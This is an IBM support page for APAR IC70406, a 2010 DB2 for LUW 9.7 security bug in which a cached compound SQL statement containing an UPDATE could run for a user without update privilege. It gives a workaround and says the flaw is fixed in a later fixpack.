IC70406: SECURITY: UPDATE AGAINST A TABLE VIA A COMPOUND SQL (COMPILED) STATEMENT MAY BE EXECUTED BY USER WTHOUT REQUIRED PRIVILEGES

Subscribe

You can track all active APARs for this component.

APAR status

  • Closed as program error.

Error description

  • If a compound SQL (compiled) statement has been issued by a user
    that is properly authorized, this is cached in the dynamic SQL
    cache.    Once cached, this same query can be executed by any
    user if that user has the proper authority.
    
    In this case, there is a bug when the compound SQL (compiled)
    statement includes an update statement against a table.   In
    this case once the statement has been compiled (via a prepare or
    execute immediate request) by a user with the required update
    privilege on the table, then a user that does not have update
    privilege on the table issuing the same statement might be able
    to resolve to the cached entry and successfully execute the
    query.
    
    The problem only applies to update privileges, compound SQL
    (compiled) statements and statements that have already been
    cached.
    

Local fix

  • Avoid update statements in compound SQL (compiled) statements
    

Problem summary

  • ****************************************************************
    * USERS AFFECTED:                                              *
    * compound SQL (compiled) statements with table updates        *
    ****************************************************************
    * PROBLEM DESCRIPTION:                                         *
    * unauthorized user able to issue cached compound SQL          *
    * (compiled) statement with update statement                   *
    ****************************************************************
    * RECOMMENDATION:                                              *
    * move to DB2 for LUW version 9, fixpack 3                     *
    ****************************************************************
    

Problem conclusion

  • Fixed in DB2 for LUW version 9, fixpack 3
    

Temporary fix

Comments

APAR Information

  • APAR number

    IC70406

  • Reported component name

    DB2 FOR LUW

  • Reported component ID

    DB2FORLUW

  • Reported release

    970

  • Status

    CLOSED PER

  • PE

    NoPE

  • HIPER

    NoHIPER

  • Special Attention

    NoSpecatt

  • Submitted date

    2010-08-05

  • Closed date

    2010-09-14

  • Last modified date

    2010-09-14

  • APAR is sysrouted FROM one or more of the following:

  • APAR is sysrouted TO one or more of the following:

    IC70408

Fix information

  • Fixed component name

    DB2 FOR LUW

  • Fixed component ID

    DB2FORLUW

Applicable component levels

  • R970 PSN

       UP

  • R980 PSN

       UP



Rate this page:

(0 users)Average rating

Add comments

Document information


More support for:

DB2 for Linux, UNIX and Windows

Software version:

9.7

Reference #:

IC70406

Modified date:

2010-09-14

Translate my page

Machine Translation

Content navigation